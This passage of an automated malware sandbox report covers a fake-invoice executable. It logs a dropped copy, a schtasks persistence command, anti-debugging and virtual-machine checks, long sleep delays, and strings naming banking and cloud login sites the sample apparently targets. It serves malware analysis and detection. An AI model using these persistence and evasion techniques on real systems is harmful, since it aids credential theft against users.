            Source: z1SupplyInvoiceCM60916_Doc.exeStatic PE information: section name: .text entropy: 7.5545631367801445
            Source: dpqsbGoWdXlp.exe.0.drStatic PE information: section name: .text entropy: 7.5545631367801445
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, 0.2.z1SupplyInvoiceCM60916_Doc.exe.46f5ac8.2.raw.unpack: High entropy of concatenated method names
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe File created: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe

            Boot Survival

            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp"

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: Yara matchFile source: Process Memory Space: z1SupplyInvoiceCM60916_Doc.exe PID: 3840, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dpqsbGoWdXlp.exe PID: 1708, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: 16C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: 34A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: 3340000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: 9460000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: 77A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: A460000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeMemory allocated: B460000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: 1050000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: 29F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: 49F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: 8710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: 7230000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: 9710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeMemory allocated: A710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0174096E rdtsc 11_2_0174096E
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeCode function: 12_2_010B6EC1 sidt fword ptr [ebx+0000C3C2h]12_2_010B6EC1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5908Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6575Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 9742Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe TID: 3896Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5580Thread sleep count: 5908 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1008Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 404Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2328Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe TID: 3796Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe TID: 3360Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe TID: 3360Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe TID: 3360Thread sleep time: -42000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4412Thread sleep count: 231 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4412Thread sleep time: -462000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4412Thread sleep count: 9742 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exe TID: 4412Thread sleep time: -19484000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_007CC3A0 FindFirstFileW,FindNextFileW,FindClose,15_2_007CC3A0
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 7-j38IBI.15.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000002.2189838691.00000000018BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
            Source: 7-j38IBI.15.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 7-j38IBI.15.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: 7-j38IBI.15.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 7-j38IBI.15.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: svchost.exe, 0000000F.00000002.4575202622.0000000002E0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
            Source: 7-j38IBI.15.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 7-j38IBI.15.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: firefox.exe, 00000017.00000002.2584597655.0000025C7218C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 7-j38IBI.15.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: IEFVDUdSaLLhw.exe, 0000000D.00000002.4576448168.0000000000A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls"Q
            Source: 7-j38IBI.15.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 7-j38IBI.15.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 7-j38IBI.15.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 7-j38IBI.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 7-j38IBI.15.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: z1SupplyInvoiceCM60916_Doc.exe, 00000000.00000002.2189838691.00000000018BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l4+,uF
            Source: 7-j38IBI.15.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 7-j38IBI.15.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 7-j38IBI.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 7-j38IBI.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 7-j38IBI.15.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_004177A3 LdrLoadDll,11_2_004177A3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4164 mov eax, dword ptr fs:[00000030h]11_2_017D4164
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017083C0 mov eax, dword ptr fs:[00000030h]11_2_017083C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017083C0 mov eax, dword ptr fs:[00000030h]11_2_017083C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017083C0 mov eax, dword ptr fs:[00000030h]11_2_017083C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017083C0 mov eax, dword ptr fs:[00000030h]11_2_017083C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BC3CD mov eax, dword ptr fs:[00000030h]11_2_017BC3CD
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017863C0 mov eax, dword ptr fs:[00000030h]11_2_017863C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FE388 mov eax, dword ptr fs:[00000030h]11_2_016FE388
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FE388 mov eax, dword ptr fs:[00000030h]11_2_016FE388
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FE388 mov eax, dword ptr fs:[00000030h]11_2_016FE388
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F8397 mov eax, dword ptr fs:[00000030h]11_2_016F8397
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F8397 mov eax, dword ptr fs:[00000030h]11_2_016F8397
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F8397 mov eax, dword ptr fs:[00000030h]11_2_016F8397
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172438F mov eax, dword ptr fs:[00000030h]11_2_0172438F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172438F mov eax, dword ptr fs:[00000030h]11_2_0172438F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F826B mov eax, dword ptr fs:[00000030h]11_2_016F826B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01704260 mov eax, dword ptr fs:[00000030h]11_2_01704260
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01704260 mov eax, dword ptr fs:[00000030h]11_2_01704260
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01704260 mov eax, dword ptr fs:[00000030h]11_2_01704260
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D625D mov eax, dword ptr fs:[00000030h]11_2_017D625D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01706259 mov eax, dword ptr fs:[00000030h]11_2_01706259
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BA250 mov eax, dword ptr fs:[00000030h]11_2_017BA250
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BA250 mov eax, dword ptr fs:[00000030h]11_2_017BA250
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01788243 mov eax, dword ptr fs:[00000030h]11_2_01788243
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01788243 mov ecx, dword ptr fs:[00000030h]11_2_01788243
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FA250 mov eax, dword ptr fs:[00000030h]11_2_016FA250
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F823B mov eax, dword ptr fs:[00000030h]11_2_016F823B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017102E1 mov eax, dword ptr fs:[00000030h]11_2_017102E1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017102E1 mov eax, dword ptr fs:[00000030h]11_2_017102E1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017102E1 mov eax, dword ptr fs:[00000030h]11_2_017102E1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D62D6 mov eax, dword ptr fs:[00000030h]11_2_017D62D6
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A2C3 mov eax, dword ptr fs:[00000030h]11_2_0170A2C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A2C3 mov eax, dword ptr fs:[00000030h]11_2_0170A2C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A2C3 mov eax, dword ptr fs:[00000030h]11_2_0170A2C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A2C3 mov eax, dword ptr fs:[00000030h]11_2_0170A2C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A2C3 mov eax, dword ptr fs:[00000030h]11_2_0170A2C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017962A0 mov eax, dword ptr fs:[00000030h]11_2_017962A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017962A0 mov ecx, dword ptr fs:[00000030h]11_2_017962A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017962A0 mov eax, dword ptr fs:[00000030h]11_2_017962A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017962A0 mov eax, dword ptr fs:[00000030h]11_2_017962A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017962A0 mov eax, dword ptr fs:[00000030h]11_2_017962A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017962A0 mov eax, dword ptr fs:[00000030h]11_2_017962A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E284 mov eax, dword ptr fs:[00000030h]11_2_0173E284
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E284 mov eax, dword ptr fs:[00000030h]11_2_0173E284
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01780283 mov eax, dword ptr fs:[00000030h]11_2_01780283
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01780283 mov eax, dword ptr fs:[00000030h]11_2_01780283
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01780283 mov eax, dword ptr fs:[00000030h]11_2_01780283
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173656A mov eax, dword ptr fs:[00000030h]11_2_0173656A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173656A mov eax, dword ptr fs:[00000030h]11_2_0173656A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173656A mov eax, dword ptr fs:[00000030h]11_2_0173656A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01708550 mov eax, dword ptr fs:[00000030h]11_2_01708550
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01708550 mov eax, dword ptr fs:[00000030h]11_2_01708550
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710535 mov eax, dword ptr fs:[00000030h]11_2_01710535
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710535 mov eax, dword ptr fs:[00000030h]11_2_01710535
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710535 mov eax, dword ptr fs:[00000030h]11_2_01710535
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710535 mov eax, dword ptr fs:[00000030h]11_2_01710535
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710535 mov eax, dword ptr fs:[00000030h]11_2_01710535
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01710535 mov eax, dword ptr fs:[00000030h]11_2_01710535
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E53E mov eax, dword ptr fs:[00000030h]11_2_0172E53E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E53E mov eax, dword ptr fs:[00000030h]11_2_0172E53E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E53E mov eax, dword ptr fs:[00000030h]11_2_0172E53E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E53E mov eax, dword ptr fs:[00000030h]11_2_0172E53E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E53E mov eax, dword ptr fs:[00000030h]11_2_0172E53E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01796500 mov eax, dword ptr fs:[00000030h]11_2_01796500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D4500 mov eax, dword ptr fs:[00000030h]11_2_017D4500
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017025E0 mov eax, dword ptr fs:[00000030h]11_2_017025E0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172E5E7 mov eax, dword ptr fs:[00000030h]11_2_0172E5E7
